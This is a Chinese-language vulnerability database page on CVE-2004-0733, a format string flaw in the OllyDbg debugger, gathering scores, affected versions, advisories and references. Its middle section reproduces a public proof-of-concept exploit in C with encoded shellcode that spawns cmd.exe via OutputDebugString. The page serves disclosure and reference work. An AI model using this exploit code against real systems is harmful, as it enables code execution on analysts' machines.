CVE-2004-0733
CVSS7.5
发布时间 :2004-07-27 00:00:00
修订时间 :2016-10-17 22:48:24
NMCOES    

[原文]Format string vulnerability in OllyDbg 1.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string specifiers that are directly provided to the OutputDebugString function call.


[CNNVD]OllyDbg Debugger消息格式串处理漏洞(CNNVD-200407-059)

        
        OllyDbg是一个32位汇编级的直观的分析调试器。
        OllyDbg在处理调式包含格式串的消息时存在问题,被跟踪的应用程序可以使OllyDbg崩溃,或可能以进程权限执行任意指令。
        OllyDbg跟踪一进程并允许用户自定义会话,如是否跟踪或设置断点等。其中OutputDebugString函数可发送字符串到调试器上,然后OllyDbg会在底端显相关状态消息,但是如果包含格式串消息,就可能使OllyDbg崩溃。精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ollydbg:ollydbg:1.0.6
cpe:/a:ollydbg:ollydbg:1.10
cpe:/a:ollydbg:ollydbg:1.0.8b
cpe:/a:ollydbg:ollydbg:1.0.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0733
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0733
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-059
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0711.html
(UNKNOWN)  FULLDISC  20040717 [FMADV] Format String Bug in OllyDbg 1.10
http://marc.info/?l=bugtraq&m=109007978822810&w=2
(UNKNOWN)  BUGTRAQ  20040717 [FMADV] Format String Bug in OllyDbg 1.10
http://www.milw0rm.com/exploits/3757
(UNKNOWN)  MILW0RM  3757
http://www.securityfocus.com/bid/10742
(VENDOR_ADVISORY)  BID  10742
http://xforce.iss.net/xforce/xfdb/16711
(VENDOR_ADVISORY)  XF  ollydbg-outputdebugstring-format-string(16711)

- 漏洞信息

OllyDbg Debugger消息格式串处理漏洞
高危 输入验证
2004-07-27 00:00:00 2005-10-20 00:00:00
远程  
        
        OllyDbg是一个32位汇编级的直观的分析调试器。
        OllyDbg在处理调式包含格式串的消息时存在问题,被跟踪的应用程序可以使OllyDbg崩溃,或可能以进程权限执行任意指令。
        OllyDbg跟踪一进程并允许用户自定义会话,如是否跟踪或设置断点等。其中OutputDebugString函数可发送字符串到调试器上,然后OllyDbg会在底端显相关状态消息,但是如果包含格式串消息,就可能使OllyDbg崩溃。精心构建提交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        OllyDbg
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://home.t-online.de/home/Ollydbg/

- 漏洞信息 (388)

Ollydbg <= 1.10 Format String Bug (EDBID:388)
windows local
2004-08-10 Verified
0 Ahmet Cihan
N/A [点击下载]
// Exploit opens a new cmd.exe.Tested on win2k(en)+sp4(en)+ollydbg v1.09d
// Open exploit with ollydebug and run the exploit from ollydebug(F9 key).
// Coded by Ahmet Cihan(a.k.a. hurby)
// Thanx to r3d_b4r0n, Murat Erdo??an(a.k.a. Stormwr), Onur Cihan(a.k.a.eurnie and 3710336), Orhan Tun????z and Mehmet Yakut.

#include <stdio.h>
#include <windows.h>
#include <winbase.h>

#pragma comment(lib,"kernel32.lib")

void main(){
        unsigned char buffer[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\x99\x40\x81\x38\x54\x55\x52\x4B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\
\x12\x75\xCC\x12\x75\xF1\xFC\xE1\xFC\xB9\xF1\xFA\xF4\xFD\xB7\x14\xDC\x61\xC9\x21\x26\x17\x98\xE1\x66\x49\
\x54\x55\x52\x4B\xCD%.1423x\x3E\x02\x4B\x02";

        OutputDebugString(buffer);
}

// milw0rm.com [2004-08-10]
		

- 漏洞信息

8408
OllyDbg OutputDebugString Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-07-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

OllyDbg Debugger Messages Format String Vulnerability
Input Validation Error 10742
Yes No
2004-07-17 12:00:00 2007-04-17 10:41:00
Discovery is credited to ned <nd@felinemenace.org>.

- 受影响的程序版本

OllyDbg OllyDbg 1.10
OllyDbg OllyDbg 1.0 9
OllyDbg OllyDbg 1.0 8b
OllyDbg OllyDbg 1.0 6

- 漏洞讨论

OllyDbg is prone to a format-string vulnerability.

This issue occurs when the application handles debugger messages that contain format specifiers.

Debugging a malicious program that is designed to exploit this issue could crash the application or allow arbitrary code to run in the context of the user running the debugger.

- 漏洞利用

The following exploit was provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站